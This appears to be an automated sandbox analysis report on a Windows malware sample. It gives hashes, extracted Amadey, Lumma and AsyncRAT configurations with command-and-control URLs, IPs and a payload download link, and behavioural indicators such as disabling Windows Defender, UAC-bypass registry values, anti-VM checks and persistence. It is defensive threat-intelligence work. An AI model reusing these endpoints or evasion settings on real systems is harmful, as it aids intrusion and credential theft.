Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
14/03/2025, 04:43
Static task
static1
Behavioral task
behavioral1
Sample
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Resource
win10v2004-20250313-en
General
-
Target
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
-
Size
938KB
-
MD5
23abb2c0ef0f3dc30270a9afd6b27530
-
SHA1
aa4fd27820b03a511ebac7b3ee05a95dce3c2c52
-
SHA256
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373
-
SHA512
2f194dea83725bf08837c0ac938efaf015a079f7c59f90e770efec2553f75e2e2cedf899575e5b9194a7b99378177194302cbb2acc9f80557dce5eace5216b8d
-
SSDEEP
24576:5qDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:5TvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://dorangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://biochextryhub.bet/api
https://q8explorebieology.run/api
https://gadgethgfub.icu/api
https://moderzysics.top/api
https://5ktechmindzs.live/api
https://6codxefusion.top/api
https://7phygcsforum.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
Extracted
asyncrat
| Controller
Default
20.206.204.9:4449
ammmjprqjnqswrieh
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://moderzysics.top/api
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" powershell.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/memory/6728-24327-0x000000001E4C0000-0x000000001E5D2000-memory.dmp family_stormkitty behavioral2/memory/5968-24536-0x0000000001100000-0x0000000001404000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4720 created 3460 4720 Seat.com 54 PID 4720 created 3460 4720 Seat.com 54 PID 8156 created 680 8156 powershell.exe 7 PID 8176 created 680 8176 powershell.exe 7 PID 4824 created 680 4824 powershell.exe 7 -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" D9ohTv4jcH.exe -
resource yara_rule behavioral2/files/0x0007000000024452-24235.dat VenomRAT behavioral2/memory/6728-24247-0x0000000000BD0000-0x0000000000BE8000-memory.dmp VenomRAT behavioral2/memory/5968-24536-0x0000000001100000-0x0000000001404000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000024452-24235.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4625c3eb40.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 10 1804 powershell.exe 15 1928 powershell.exe 20 5096 powershell.exe 98 12600 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 8180 powershell.exe 2444 powershell.exe 1804 powershell.exe 1928 powershell.exe 5096 powershell.exe 4708 powershell.exe 1404 powershell.exe 3876 powershell.exe 1376 powershell.exe 3308 powershell.exe 6192 powershell.exe 9592 powershell.exe 9956 powershell.exe 10112 powershell.exe 10372 powershell.exe -
Downloads MZ/PE file 21 IoCs
flow pid Process 98 12600 wscript.exe 150 3596 rapes.exe 10 1804 powershell.exe 20 5096 powershell.exe 135 3596 rapes.exe 143 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 43 3852 svchost.exe 138 8104 svchost.exe 15 1928 powershell.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4625c3eb40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4625c3eb40.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation st22BJg.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation ADFoyxP.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation Go7yA2t.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation D9ohTv4jcH.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe -
Executes dropped EXE 44 IoCs
pid Process 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 3596 rapes.exe 2480 2af4a002ad.exe 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 752 XW3ITet.exe 2616 gtjFHJI.exe 3732 483d2fa8a0d53818306efeb32d3.exe 4576 Go7yA2t.exe 2268 rapes.exe 2204 9CQknW9.exe 1916 h2wb5_002.exe 456 dbs.exe 2028 dbs.exe 12908 HmngBpR.exe 13032 SplashWin.exe 13144 SplashWin.exe 4024 zY9sqWs.exe 1724 Gxtuum.exe 3948 ADFoyxP.exe 6416 9JFiKVm.exe 6728 D9ohTv4jcH.exe 4720 Seat.com 11944 rapes.exe 12256 Gxtuum.exe 12452 st22BJg.exe 12704 file.exe 6604 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6936 7BzCs1a.exe 6876 7BzCs1a.exe 6392 Security Protection Windows.pif 6212 OpenCL.pif 5968 RegAsm.exe 11336 v6Oqdnc.exe 9896 OpenCL.pif 7468 eAzoDbY.exe 7576 eAzoDbY.exe 8004 8sb9w_003.exe 8368 XW3ITet.exe 8492 ps.exe 8536 cls.exe 8684 b8815974b5.exe 8736 b8815974b5.exe 9220 4625c3eb40.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 4625c3eb40.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe -
Loads dropped DLL 23 IoCs
pid Process 13032 SplashWin.exe 13032 SplashWin.exe 13032 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 8436 pluginfast_Yj.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2af4a002ad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10205910101\\2af4a002ad.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10205920121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{72BDFAD0-4420-47FB-9C89-9154DED998EB} = "C:\\ProgramData\\{DAC8D1F9-5E77-4EE7-B778-B19F65DAAE06}\\netbtugc.exe {0A8DF263-7B68-4A06-9AA8-2351D08B8A79}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{72BDFAD0-4420-47FB-9C89-9154DED998EB} = "C:\\ProgramData\\{DAC8D1F9-5E77-4EE7-B778-B19F65DAAE06}\\netbtugc.exe {0A8DF263-7B68-4A06-9AA8-2351D08B8A79}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942} = "C:\\ProgramData\\{044B9118-D09F-44DE-8820-983AA965DB95}\\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942} = "C:\\ProgramData\\{044B9118-D09F-44DE-8820-983AA965DB95}\\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" D9ohTv4jcH.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00070000000243dd-54.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3504 tasklist.exe 6208 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 3596 rapes.exe 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 3732 483d2fa8a0d53818306efeb32d3.exe 2268 rapes.exe 11944 rapes.exe 11336 v6Oqdnc.exe 9220 4625c3eb40.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 2616 set thread context of 5328 2616 gtjFHJI.exe 120 PID 13144 set thread context of 13240 13144 SplashWin.exe 143 PID 6416 set thread context of 4444 6416 9JFiKVm.exe 158 PID 6936 set thread context of 6876 6936 7BzCs1a.exe 235 PID 6764 set thread context of 5096 6764 ShortcutTaskAgent.exe 230 PID 7468 set thread context of 7576 7468 eAzoDbY.exe 249 PID 8684 set thread context of 8736 8684 b8815974b5.exe 262 -
resource yara_rule behavioral2/files/0x000700000002446b-24429.dat upx behavioral2/memory/12452-24437-0x0000000000B00000-0x000000000160B000-memory.dmp upx behavioral2/memory/12452-24502-0x0000000000B00000-0x000000000160B000-memory.dmp upx behavioral2/memory/6392-24522-0x00000000001E0000-0x0000000000686000-memory.dmp upx behavioral2/memory/6392-24584-0x00000000001E0000-0x0000000000686000-memory.dmp upx -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\HighKerry ADFoyxP.exe File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File created C:\Windows\Tasks\rapes.job TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 11008 sc.exe 2396 sc.exe 8868 sc.exe 11064 sc.exe 4500 sc.exe 11664 sc.exe 11784 sc.exe 8844 sc.exe 8892 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4052 2204 WerFault.exe 127 7248 5968 WerFault.exe 223 7692 7468 WerFault.exe 247 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XW3ITet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7BzCs1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eAzoDbY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b8815974b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4625c3eb40.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2af4a002ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ADFoyxP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ShortcutTaskAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b8815974b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7BzCs1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eAzoDbY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8sb9w_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9CQknW9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ShortcutTaskAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Seat.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5688 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created 